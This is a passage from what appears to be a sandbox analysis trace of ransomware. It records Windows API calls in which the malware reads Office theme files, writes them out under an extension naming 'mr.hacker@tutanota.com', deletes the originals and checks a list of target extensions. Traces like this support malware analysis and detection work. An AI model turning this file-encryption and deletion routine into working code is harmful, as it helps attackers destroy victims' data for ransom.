lpOverlapped=0x0) returned 1 [0044.921] SetEndOfFile (hFile=0x200) returned 1 [0044.921] CloseHandle (hObject=0x200) returned 1 [0044.922] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0044.922] SetEndOfFile (hFile=0x208) returned 1 [0044.923] CloseHandle (hObject=0x208) returned 1 [0044.923] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0044.923] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png")) returned 1 [0044.923] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0044.923] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0044.923] lstrlenW (lpString=".doc") returned 4 [0044.923] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.923] lstrlenW (lpString=".docx") returned 5 [0044.923] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.923] lstrlenW (lpString=".pdf") returned 4 [0044.923] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.923] lstrlenW (lpString=".xls") returned 4 [0044.923] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.923] lstrlenW (lpString=".xlsx") returned 5 [0044.923] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.923] lstrlenW (lpString=".ppt") returned 4 [0044.923] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.923] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0044.923] lstrlenW (lpString=".zip") returned 4 [0044.923] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.923] lstrlenW (lpString=".rar") returned 4 [0044.924] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.924] lstrlenW (lpString=".bz2") returned 4 [0044.924] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.924] lstrlenW (lpString=".7z") returned 3 [0044.924] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.924] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0044.924] lstrlenW (lpString=".dbf") returned 4 [0044.924] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.924] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0044.924] lstrlenW (lpString=".1cd") returned 4 [0044.924] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.924] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0044.924] lstrlenW (lpString=".jpg") returned 4 [0044.924] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.924] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0044.924] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0044.924] lstrlenW (lpString=".doc") returned 4 [0044.924] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.924] lstrlenW (lpString=".docx") returned 5 [0044.924] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.924] lstrlenW (lpString=".pdf") returned 4 [0044.924] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.924] lstrlenW (lpString=".xls") returned 4 [0044.924] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.924] lstrlenW (lpString=".xlsx") returned 5 [0044.924] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.924] lstrlenW (lpString=".ppt") returned 4 [0044.924] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.924] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0044.924] lstrlenW (lpString=".zip") returned 4 [0044.924] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.924] lstrlenW (lpString=".rar") returned 4 [0044.924] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.924] lstrlenW (lpString=".bz2") returned 4 [0044.924] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.924] lstrlenW (lpString=".7z") returned 3 [0044.925] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.925] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0044.925] lstrlenW (lpString=".dbf") returned 4 [0044.925] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.925] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0044.925] lstrlenW (lpString=".1cd") returned 4 [0044.925] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.925] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0044.925] lstrlenW (lpString=".jpg") returned 4 [0044.925] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.925] lstrcmpiW (lpString1=".GIF", lpString2=".USA") returned -1 [0044.925] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0044.925] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0044.925] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=2722) returned 1 [0044.925] CloseHandle (hObject=0x208) returned 1 [0044.925] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\preview.gif")) returned 0x20 [0044.925] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0044.926] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0044.926] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0044.926] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0044.926] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0044.929] GetLastError () returned 0x0 [0044.929] ReadFile (in: hFile=0x208, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0xaa2, lpOverlapped=0x0) returned 1 [0044.931] WriteFile (in: hFile=0x200, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xab0, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xab0, lpOverlapped=0x0) returned 1 [0044.932] ReadFile (in: hFile=0x208, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0044.932] WriteFile (in: hFile=0x200, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xea, lpOverlapped=0x0) returned 1 [0044.932] SetEndOfFile (hFile=0x200) returned 1 [0044.932] CloseHandle (hObject=0x200) returned 1 [0044.932] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0044.932] SetEndOfFile (hFile=0x208) returned 1 [0044.933] CloseHandle (hObject=0x208) returned 1 [0044.933] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0044.933] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\preview.gif")) returned 1 [0044.934] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0044.934] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0044.934] lstrlenW (lpString=".doc") returned 4 [0044.934] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.934] lstrlenW (lpString=".docx") returned 5 [0044.934] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.934] lstrlenW (lpString=".pdf") returned 4 [0044.934] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.934] lstrlenW (lpString=".xls") returned 4 [0044.934] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.934] lstrlenW (lpString=".xlsx") returned 5 [0044.934] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.934] lstrlenW (lpString=".ppt") returned 4 [0044.934] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.934] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0044.934] lstrlenW (lpString=".zip") returned 4 [0044.934] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.934] lstrlenW (lpString=".rar") returned 4 [0044.934] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.934] lstrlenW (lpString=".bz2") returned 4 [0044.934] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.934] lstrlenW (lpString=".7z") returned 3 [0044.934] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.934] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0044.934] lstrlenW (lpString=".dbf") returned 4 [0044.934] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.934] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0044.934] lstrlenW (lpString=".1cd") returned 4 [0044.934] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.934] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0044.934] lstrlenW (lpString=".jpg") returned 4 [0044.935] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.935] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0044.935] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0044.935] lstrlenW (lpString=".doc") returned 4 [0044.935] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.935] lstrlenW (lpString=".docx") returned 5 [0044.935] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.935] lstrlenW (lpString=".pdf") returned 4 [0044.935] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.935] lstrlenW (lpString=".xls") returned 4 [0044.935] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.935] lstrlenW (lpString=".xlsx") returned 5 [0044.935] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.935] lstrlenW (lpString=".ppt") returned 4 [0044.935] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.935] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0044.935] lstrlenW (lpString=".zip") returned 4 [0044.935] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.935] lstrlenW (lpString=".rar") returned 4 [0044.935] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.935] lstrlenW (lpString=".bz2") returned 4 [0044.935] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.935] lstrlenW (lpString=".7z") returned 3 [0044.935] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.935] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0044.935] lstrlenW (lpString=".dbf") returned 4 [0044.935] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.935] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0044.935] lstrlenW (lpString=".1cd") returned 4 [0044.935] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.935] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0044.935] lstrlenW (lpString=".jpg") returned 4 [0044.935] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.936] lstrcmpiW (lpString1=".PNG", lpString2=".USA") returned -1 [0044.936] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0044.936] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0045.201] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=43276) returned 1 [0045.201] CloseHandle (hObject=0x1f0) returned 1 [0045.201] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\thmbnail.png")) returned 0x20 [0045.201] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0045.201] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0045.201] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0045.201] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0045.201] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0045.201] GetLastError () returned 0x0 [0045.202] ReadFile (in: hFile=0x1f0, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0xa90c, lpOverlapped=0x0) returned 1 [0045.257] WriteFile (in: hFile=0x174, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xa910, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xa910, lpOverlapped=0x0) returned 1 [0045.259] ReadFile (in: hFile=0x1f0, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0045.259] WriteFile (in: hFile=0x174, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0045.259] SetEndOfFile (hFile=0x174) returned 1 [0045.259] CloseHandle (hObject=0x174) returned 1 [0045.259] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0045.259] SetEndOfFile (hFile=0x1f0) returned 1 [0045.260] CloseHandle (hObject=0x1f0) returned 1 [0045.260] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0045.260] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\thmbnail.png")) returned 1 [0045.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0045.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0045.261] lstrlenW (lpString=".doc") returned 4 [0045.261] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.261] lstrlenW (lpString=".docx") returned 5 [0045.261] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.261] lstrlenW (lpString=".pdf") returned 4 [0045.261] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.261] lstrlenW (lpString=".xls") returned 4 [0045.261] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.261] lstrlenW (lpString=".xlsx") returned 5 [0045.261] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.261] lstrlenW (lpString=".ppt") returned 4 [0045.261] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0045.261] lstrlenW (lpString=".zip") returned 4 [0045.261] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.261] lstrlenW (lpString=".rar") returned 4 [0045.261] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.261] lstrlenW (lpString=".bz2") returned 4 [0045.261] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.261] lstrlenW (lpString=".7z") returned 3 [0045.261] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0045.261] lstrlenW (lpString=".dbf") returned 4 [0045.261] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0045.261] lstrlenW (lpString=".1cd") returned 4 [0045.261] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0045.262] lstrlenW (lpString=".jpg") returned 4 [0045.262] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0045.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0045.262] lstrlenW (lpString=".doc") returned 4 [0045.262] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.262] lstrlenW (lpString=".docx") returned 5 [0045.262] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.262] lstrlenW (lpString=".pdf") returned 4 [0045.262] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.262] lstrlenW (lpString=".xls") returned 4 [0045.262] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.262] lstrlenW (lpString=".xlsx") returned 5 [0045.262] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.262] lstrlenW (lpString=".ppt") returned 4 [0045.262] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0045.262] lstrlenW (lpString=".zip") returned 4 [0045.262] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.262] lstrlenW (lpString=".rar") returned 4 [0045.262] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.262] lstrlenW (lpString=".bz2") returned 4 [0045.262] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.262] lstrlenW (lpString=".7z") returned 3 [0045.262] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0045.262] lstrlenW (lpString=".dbf") returned 4 [0045.262] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0045.262] lstrlenW (lpString=".1cd") returned 4 [0045.262] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0045.262] lstrlenW (lpString=".jpg") returned 4 [0045.262] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.263] lstrcmpiW (lpString1=".PNG", lpString2=".USA") returned -1 [0045.263] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0045.263] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0045.296] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=29925) returned 1 [0045.296] CloseHandle (hObject=0x208) returned 1 [0045.297] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\thmbnail.png")) returned 0x20 [0045.297] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0045.297] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0045.297] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0045.297] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0045.297] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0045.297] GetLastError () returned 0x0 [0045.297] ReadFile (in: hFile=0x208, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x74e5, lpOverlapped=0x0) returned 1 [0045.299] WriteFile (in: hFile=0x1f4, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x74f0, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x74f0, lpOverlapped=0x0) returned 1 [0045.300] ReadFile (in: hFile=0x208, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0045.300] WriteFile (in: hFile=0x1f4, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, 